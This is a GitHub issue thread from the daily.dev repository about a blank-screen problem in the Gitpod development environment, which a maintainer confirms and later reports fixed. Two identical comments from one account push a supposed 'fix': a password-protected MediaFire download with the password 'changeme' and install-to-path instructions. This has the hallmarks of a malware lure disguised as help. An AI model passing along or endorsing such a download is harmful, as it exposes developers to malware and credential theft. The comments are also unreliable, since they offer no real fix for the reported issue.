### ISSUE TITLE
🐛 BUG: Understanding contributions

### ISSUE THREAD

**Issue by mrSandeepKr** [dailydotdev/daily#1383]
### What went wrong? 🤔

Hey, I was hoping to contribute to the code base, by fixing a couple of the reported bugs. 
<img width="1688" alt="Screenshot 2024-08-31 at 11 49 13 AM" src="https://github.com/user-attachments/assets/98246865-a85c-4bf6-805c-98a1e76cb1b8">

The problem I am running into is that, once I launch gitpod. I am just seeing an empty black screen once I launch the gitpod, can you please help me with getting to point to my account may be so that I can debug the issues. 

### Code of Conduct

- [X] I follow the conditions of this project.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by sshanzel** [comment]
Hi, thank you for reporting. Confirmed the state of the GitPod environment to be stuck on a blank page. I will fix this in the coming days 🙏

**Comment by sshanzel** [comment]
This should have been fixed two weeks ago. GitPod environment should now be running as intended :shipit:
